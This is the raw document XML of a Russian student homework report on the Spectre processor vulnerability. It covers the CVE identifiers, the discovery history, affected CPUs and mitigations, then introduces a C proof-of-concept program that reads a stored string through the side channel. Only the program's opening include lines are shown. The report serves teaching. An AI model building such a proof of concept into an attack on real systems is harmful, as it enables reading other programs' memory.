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EB24E" w14:textId="040504C9" w:rsidR="001C3370" w:rsidRDefault="0063763C" w:rsidP="0063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САНКТ-ПЕТЕРБУРГСКИЙ НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ ИТМО </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F953ACE" w14:textId="27716A3C" w:rsidR="0063763C" w:rsidRDefault="005615EC" w:rsidP="0063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14:paraId="4505493A" w14:textId="76D71035" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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5AECD" w14:textId="105FB788" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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093B4" w14:textId="6DFF3C2D" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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477BD" w14:textId="6D62955A" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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89C19" w14:textId="37595568" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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E4707" w14:textId="7F67C5FC" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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34ADC" w14:textId="10957D84" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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1FCF79C" w14:textId="5A64F2E6" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="0063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домашней работе №6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC737CB" w14:textId="19FA2038" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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Spectre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BB2B6B2" w14:textId="0217A6E8" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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AB665" w14:textId="78E42FA9" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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5579C" w14:textId="18FEE732" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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835BF" w14:textId="1E3285EE" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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8AF04" w14:textId="666EDEBA" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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38134" w14:textId="7260767D" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00637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D74DB" w14:textId="321D6BD6" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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Зайнидинов Мирзофирдавс Шавкатович</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEAE69" w14:textId="776AB31A" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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М313Д</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365D99E" w14:textId="055A5D4A" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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B9A005" w14:textId="4A3CCC3D" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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7413B5" w14:textId="1524CE8A" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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14380F" w14:textId="62B76C91" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="005615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CCDDB4" w14:textId="1B6212DE" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00561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A8546" w14:textId="235791DE" w:rsidR="005615EC" w:rsidRDefault="005615EC" w:rsidP="00561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3B767" w14:textId="47D498B3" w:rsidR="005615EC" w:rsidRPr="00A60013" w:rsidRDefault="005615EC" w:rsidP="00561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1F2D3C8" w14:textId="3D1D47EF" w:rsidR="00F605CA" w:rsidRPr="00A60013" w:rsidRDefault="00F605CA" w:rsidP="00561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60013">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFCE165" w14:textId="3C5FD541" w:rsidR="00F605CA" w:rsidRPr="00A60013" w:rsidRDefault="00F605CA" w:rsidP="00561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4F84D" w14:textId="1AB4C3CE" w:rsidR="00F605CA" w:rsidRPr="00F605CA" w:rsidRDefault="00F605CA" w:rsidP="00F60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F605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аппаратной уязвимостью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Spectre</w:t>
      </w:r>
      <w:r w:rsidRPr="00F605CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C886A6" w14:textId="6D7813DE" w:rsidR="00F605CA" w:rsidRDefault="00F605CA" w:rsidP="00F60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Инструментарий и требования к работе:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F605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05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A51C3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F605CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6302E03B" w14:textId="77777777" w:rsidR="00F605CA" w:rsidRDefault="00F605CA" w:rsidP="00F60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20375" w14:textId="77777777" w:rsidR="00F605CA" w:rsidRDefault="00F605CA" w:rsidP="00F60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6095A7C" w14:textId="71F9319C" w:rsidR="00090FF5" w:rsidRDefault="00F605CA" w:rsidP="00090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001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Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00A60013" w:rsidRPr="00A60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0013" w:rsidRPr="00A60013">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">это группа аппаратных уязвимостей, ошибка в большинстве современных процессоров имеющих спекулятивное выполнение команд и развитое предсказание ветвлений, позволяющих проводить чтение данных через сторонний канал в виде общей иерархии </w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кэш-памяти</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Оно затрагивает большинство современных микропроцессоров, в частности архитектур </w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>х86/ч86_64</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD118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</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD11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D1187" w:rsidRPr="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMD</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и некоторые процессорные ядра </w:t>
      </w:r>
      <w:r w:rsidR="00CD1187" w:rsidRPr="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARM</w:t>
      </w:r>
      <w:r w:rsidR="00CD1187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Это уязвимость потенциально позволяет локальным приложениям получать доступ к содержимому виртуальной памяти текущего приложения или других программ. Угроза имеет два </w:t>
      </w:r>
      <w:r w:rsidR="00090FF5" w:rsidRPr="00090FF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090FF5" w:rsidRPr="00090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VE</w:t>
      </w:r>
      <w:r w:rsidR="00090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> идентификатора:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF3CBC" w14:textId="379DD478" w:rsidR="00F605CA" w:rsidRPr="00090FF5" w:rsidRDefault="00090FF5" w:rsidP="00090FF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FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2017-5753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655DEC2A" w14:textId="1EC352F0" w:rsidR="00090FF5" w:rsidRPr="00090FF5" w:rsidRDefault="00090FF5" w:rsidP="00090FF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0FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2017-5715</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46517EC7" w14:textId="6B49717E" w:rsidR="00090FF5" w:rsidRDefault="00090FF5" w:rsidP="00090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F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00090F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база данных общеизвестных уязвимостей информационной безопасности. Каждый уязвимости присваивается номер вида </w:t>
      </w:r>
      <w:r w:rsidRPr="00090FF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090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VE</w:t>
      </w:r>
      <w:r w:rsidRPr="00090FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-год-номер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, описание и ряд общедоступных ссылок с описанием. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141FFD2" w14:textId="77777777" w:rsidR="00F43D15" w:rsidRDefault="00090FF5" w:rsidP="00090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</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">об истории происхождения уязвимостей </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C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Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C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Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00A209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09C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">была обнаружена независимо друг от друга исследователями корпорацией </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3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="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и группой, сотрудничающей с </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paul</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209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09C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kocher</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> при участии сотрудников Грацского технического университета. По </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00A209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09C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификации можно догадаться что уязвимость была найдена в </w:t>
      </w:r>
      <w:r w:rsidR="00A209C3" w:rsidRPr="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2017</w:t>
      </w:r>
      <w:r w:rsidR="00A209C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> году и несколько месяцев</w:t>
      </w:r>
      <w:r w:rsidR="00F43D15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> находилось на стадии закрытого обсуждения и исправления. Публикации были обнародованы 4 января 2018 года, под новый год.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008A8B51" w14:textId="74E7A067" w:rsidR="00A209C3" w:rsidRDefault="00F43D15" w:rsidP="00090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о самой уязвимости. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43D15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Spectre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злонамеренным пользовательским приложениям, работающим на данном компьютере, получить доступ к чтению произвольных  частей компьютерной памяти, используемой процессом-жертвой, например другими приложениями. Атаке </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43D15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Spectre</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2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подвержено большинство компьютерных систем, использующих высокопроизводительные ми</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F3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ро</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">процессоры, в том числе персональные компьютеры, серверы, ноутбуки и ряд мобильных устройств. В частности, атака </w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2F3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Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> была продемонстрирована</w:t>
      </w:r>
      <w:r w:rsidR="00EC2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2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">на процессорах производства корпораций </w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2F3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</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2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2F32" w:rsidRPr="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AMD</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и на чипах, использующих процессорные ядра </w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARM</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Можно еще атаковать с помощью </w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2F3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Spectre</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F32" w:rsidRPr="00EC2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2F32" w:rsidRPr="00EC2F32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="00EC2F32" w:rsidRPr="00EC2F3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C2F32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программы для получение доступа к браузеру, чтение данных других сайтов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7669D" w14:textId="77777777" w:rsidR="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="00090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не существует готовых программных технологий защиты от атак </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B7D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Spectre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, хотя ведется определённая работа в этой сфере. По данным веб – сайта, посвященному продвижению атаки, «Это не так легко исправить, и это ошибка будет преследовать нас в течении длительного времени».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB41A7" w14:textId="77777777" w:rsidR="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="006E6B7D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исправление может включать в себя перекомпиляцию </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПО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(программного обеспечения) при помощи новых компиляторов с заменой уязвимой последовательности машинного кода.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6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6B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Производителями процессоров предложено несколько вариантов исправлений, некоторые из которых требуют обновлений микрокода процессора, другие — добавления новых инструкций в будущие процессоры. Исправления должны сочетаться с перекомпиляцией </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B7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</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B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2624B2B3" w14:textId="53C0C304" w:rsidR="00EC2F32" w:rsidRPr="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="006E6B7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Ниже приведен классификация найденных за 2018 год вариаций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Meltdown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6E6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Spectre</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B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(см. рисунок №1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02161C66" w14:textId="0539EBFB" w:rsidR="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="006E6B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3EF533" wp14:editId="11B91A7D">
            <wp:extent cx="5996940" cy="3535680"/>
            <wp:effectExtent l="0" t="0" r="381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001D" w14:textId="1DACF1C2" w:rsidR="006E6B7D" w:rsidRDefault="006E6B7D" w:rsidP="006E6B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№1. Классификация найденных за год (2018) вариаций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Meltdown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Spectre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EC350A2" w14:textId="75F91052" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="006E6B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F3FFD7" w14:textId="21AAC43B" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="006E6B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20DD04" w14:textId="43D5317A" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C3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работа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01924AAC" w14:textId="1A07EA5F" w:rsidR="00A51C39" w:rsidRPr="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C3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практической части работал с языком </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51C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По условию задачи нам будет дона строка и мы должны будем сохранить ее в части памяти и не вызывая эту часть вывести строку, код работает аналогично. Добавлены исключения и обработки ошибок, компилируется с помощью компилятора </w:t>
      </w:r>
      <w:r w:rsidR="00452D4B" w:rsidRPr="00452D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С-99</w:t>
      </w:r>
      <w:r w:rsidR="00452D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онлайн компилятор. Добавлены поддержка для работы с файлами.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54AA63" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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33A270" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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7C688E" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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84B95" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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820D4A" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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D95CBD" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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B6723A" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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6D9F6D" w14:textId="77777777" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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7F4C7" w14:textId="7D48D057" w:rsidR="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C3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для практической части</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBCBA3" w14:textId="35450E52" w:rsidR="00A51C39" w:rsidRPr="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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Компилятор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A51C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-99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EDAFA" w14:textId="10D8544A" w:rsidR="00A51C39" w:rsidRPr="00A51C39" w:rsidRDefault="00A51C39" w:rsidP="00A51C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Pr="00A51C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</w:p>
    <w:p w14:paraId="2185AC39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</w:rPr>
        <w:t>#</w:t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include</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51C39">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t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stdio</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51C39">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t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h</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51C39">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CC3A0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#include &lt;stdint.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70599E73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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39208D00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#ifdef _MSC_VER</w:t>
      </w:r>
